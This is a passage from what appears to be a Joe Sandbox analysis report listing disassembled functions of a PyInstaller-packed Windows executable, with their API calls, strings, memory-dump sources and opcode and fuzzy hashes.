                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                  • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                  • Instruction ID: 292e865b91f1ef857576b84c42e0cea15a61e894af5280f7789b99ea8d095d60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D031A472619A8284EB21EF21EC552FAB361FF99794F900135EA4E47B49DF3CD104CB10
                                                                                                                                                                                                                                  Function 00007FF72C652B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF72C65918F,?,00007FF72C653C55), ref: 00007FF72C652BA0
                                                                                                                                                                                                                                  • MessageBoxW.USER32 ref: 00007FF72C652C2A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                  • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                  • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                  • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                  • Instruction ID: 5d3f22c610251f6ece640e35ebf42f2006ddb559cb5cd631cd3f015714843d58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB21D122708B4292E712AB54F8457AAB3A6FB987D4F800136EE8D53659DE3CD219CB50
                                                                                                                                                                                                                                  Function 00007FF72C652710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF72C651B99), ref: 00007FF72C652760
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                  • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                  • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                  • Instruction ID: 232d3d0a5cfeb901089f2024ed04681c0f1170c3fc9ebe893d224d8437097657
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF21B232A18B8292E721EB50BC417E6B3A5FB983E4F900136FE8D43659DF7CD1498B50
                                                                                                                                                                                                                                  Function 00007FF72C669A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction ID: ae81148a40a3e58e71dc2da579647c5ac35ce6a7802ebd3fccee1782f7d5053d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0C82170870781EA15AB10EC4933AA371FF94770F940639CA6E455E4DF2CD48CCB20
                                                                                                                                                                                                                                  Function 00007FF72C679368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction ID: c0fc834633b997149547d233c601b28d733ff1fad658722d3fa7980960768f62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF119632D58A0201FA567165EC9337990D3FF7C378E880E34E76E06AD58E6C9849CE20
                                                                                                                                                                                                                                  Function 00007FF72C66B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3AF
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3CE
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B3F6
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B407
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C66A5A3,?,?,00000000,00007FF72C66A83E,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66B418
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                  • Instruction ID: 50677f509f3fe0502c9133559968d4331df57f5656ab6f5dd6a059a279eaf794
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9116330F0864381F95AB3665E51239B163FFA47B0FE44338E97D466CADE2CA4415A21
                                                                                                                                                                                                                                  Function 00007FF72C66B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                  • Instruction ID: 91aff1a4218b12280ddb1d21c226ababfb5afb4d7add09cf78fe9f9f70166706
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C110D24A0C20785F99A72614D51179B2A7FFA5330FA4473CE97E456C2DE2DB4815A31
                                                                                                                                                                                                                                  Function 00007FF72C665FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                  • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction ID: 4d3c2c19871df30d0da8be690ca060c8999831cb4cf82644c868f4712a798c62
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0591F532A0CA4641E722AE29EC5037DF6B6FB60B64FE44139DA5D433C5DE3DE4458B20
                                                                                                                                                                                                                                  Function 00007FF72C66FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                  • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction ID: 9168ac49bc1544466ca037400ab4dc9444bc15183802600d0e4d9c06423c100f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA819672D081429DE7667E25C910379B6F2FB31768FF54039CA0997285CF2EB9019B23
                                                                                                                                                                                                                                  Function 00007FF72C65D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction ID: b353b5b21308d8c34528948bb3da8c03ed2b24e3718d2fcd16a3f259ff3d6573
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13519136A196028ADB16EB15D944A7DB792FB64BE8FA04130DB4D477C8DF7CE841CB10
                                                                                                                                                                                                                                  Function 00007FF72C65EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                  • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction ID: c4a12d63d9c9e1749a6b0f7ed45af4343cb6e5eddea43c0770adb01e305bf7a3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2619E32908BC585EB31AF15E8403AAB7A1FB957E8F544225EB9C03B99DF7DD090CB10
                                                                                                                                                                                                                                  Function 00007FF72C65F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                  • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction ID: 48c74187229be5f65c86340b6f42d7d27ce04f4ff2c29b7c0277e5e36e681679
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6951A4326082428AEB65AB21D94427CB792FF64BE4FA44135DB4C43BC6CF3DE450CB56
                                                                                                                                                                                                                                  Function 00007FF72C657E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF72C65352C,?,00000000,00007FF72C653F23), ref: 00007FF72C657F32
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                  • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                  • Instruction ID: 3ab870406fbb125b25def75207c35beec4136f729361646222f73b7df737d243
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC31E921729AC145EA32AB10EC103AAA256FF94BF0F900630EB6D437C9DE2CD205CB10
                                                                                                                                                                                                                                  Function 00007FF72C652810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                  • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                  • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                  • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                                                                                                                                                                  • Instruction ID: efc2cc75949c28834838293192019e9b07c730c3f009e7eae94369211073c948
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
